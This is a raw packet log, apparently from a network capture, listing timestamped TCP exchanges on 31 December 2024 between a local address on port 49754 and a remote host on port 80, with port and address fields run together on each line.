                                                                                                              Dec 31, 2024 09:48:42.105551958 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.105587959 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.105597019 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.105628014 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.105628014 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.105637074 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.105639935 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.105658054 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.105669022 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.105676889 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.105679989 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.105700016 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.106111050 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.106122017 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.106137991 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.106149912 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.106159925 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.106184006 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.106189966 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.106200933 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.106210947 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.106230021 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.106245995 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.106259108 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.106268883 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.106280088 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.106290102 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.106302023 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.106336117 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.106489897 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.106502056 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.106512070 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.106522083 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.106530905 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.106554031 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.106590033 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.106601000 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.106611013 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.106621027 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.106628895 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.106647015 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.117240906 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.226808071 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.226830006 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.226841927 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.226882935 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.226931095 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.226942062 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.226953030 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.226972103 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.226982117 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.227031946 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.227042913 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.227052927 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.227078915 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.227147102 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.227181911 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.227202892 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.227267027 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.227277040 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.227287054 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.227298021 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.227305889 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.227323055 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.227351904 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.227363110 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.227380991 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.227390051 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.227400064 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.227401018 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.227413893 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.227433920 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.227485895 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.227495909 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.227507114 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.227515936 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.227525949 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.227525949 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.227535009 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.227556944 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.227577925 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.227588892 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.227597952 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.227629900 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.227638960 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.227698088 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.227709055 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.227719069 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.227746010 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.227758884 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.227768898 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.227797031 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.227799892 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.227807999 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.227832079 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.227837086 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.227842093 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.227852106 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.227860928 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.227864027 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.227891922 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.227916002 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.227926016 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.227936029 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.227946997 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.227962971 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.227967978 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.227972984 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.227974892 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.227982998 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.227993965 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.228024006 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.228074074 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.228147984 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.228163004 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.228173018 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.228183031 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.228193045 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.228204012 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.228269100 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.228347063 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.228379011 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.228388071 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.228413105 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.228420019 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.228421926 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.228449106 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.228601933 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.228612900 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.228621960 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.228634119 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.228641987 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.228667021 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.229751110 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.229794979 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.229839087 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.229847908 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.229857922 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.229868889 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.229882002 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.229888916 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.229904890 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.229923964 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.229933977 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.229939938 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.229944944 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.229975939 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.230104923 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.230114937 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.230124950 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.230137110 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.230144978 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.230151892 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.230178118 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.230443954 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.230454922 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.230464935 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.230475903 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.230489016 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.230520964 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.230694056 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.230741978 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.230751038 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.230761051 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.230771065 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.230786085 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.230787039 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.230809927 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.230823040 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.231034040 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.231043100 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.231075048 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.231076002 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.231085062 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.231096983 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.231112003 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.231116056 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.231122017 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.231136084 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.231183052 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.231199980 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.231210947 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.231218100 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.231220007 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.231235027 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.231241941 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.231245041 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.231255054 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.231267929 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.231276989 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.231278896 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.231304884 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.231311083 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.231328011 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.231354952 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.231625080 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.231640100 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.231651068 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.231662035 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.231672049 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.231682062 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.231687069 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.231693029 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.231703043 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.231713057 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.231730938 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.351969004 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.351979017 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.352058887 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.352163076 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.352179050 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.352190018 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.352199078 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.352210045 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.352224112 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.352260113 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.352480888 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.352492094 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.352503061 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.352519035 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.352525949 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.352535963 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.352538109 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.352546930 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.352556944 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.352596045 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.352607012 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.352617979 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.352643967 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.352644920 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.352654934 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.352665901 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.352677107 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.352686882 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.352694035 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.352719069 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.352864981 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.352880955 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.352891922 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.352901936 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.352917910 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.352920055 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.352942944 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.352953911 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.352956057 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.352963924 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.352974892 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.352986097 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.352994919 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.352996111 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.353018999 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.353024960 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.353033066 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.353074074 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.353084087 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.353086948 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.353089094 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.353132963 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.353177071 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.353188038 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.353193045 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.353216887 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.353226900 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.353230000 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.353254080 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.353264093 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.353274107 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.353277922 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.353300095 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.353318930 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.353337049 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.353348970 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.353359938 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.353369951 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.353389978 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.353414059 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.353458881 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.353470087 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.353481054 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.353488922 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.353502035 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.353526115 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.353624105 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.353634119 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.353643894 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.353657961 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.353666067 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.353667974 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.353678942 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.353698015 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.353722095 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.353878975 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.353889942 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.353899956 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.353920937 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.355036974 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.355053902 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.355063915 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.355073929 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.355083942 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.355093002 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.355120897 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.355180025 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.355189085 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.355200052 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.355217934 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.355226994 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.355232000 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.355259895 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.355343103 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.355353117 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.355364084 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.355380058 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.355381966 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.355390072 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.355403900 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.355431080 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:42.355448961 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:42.355459929 CET8049754185.215.113.16192.168.2.6
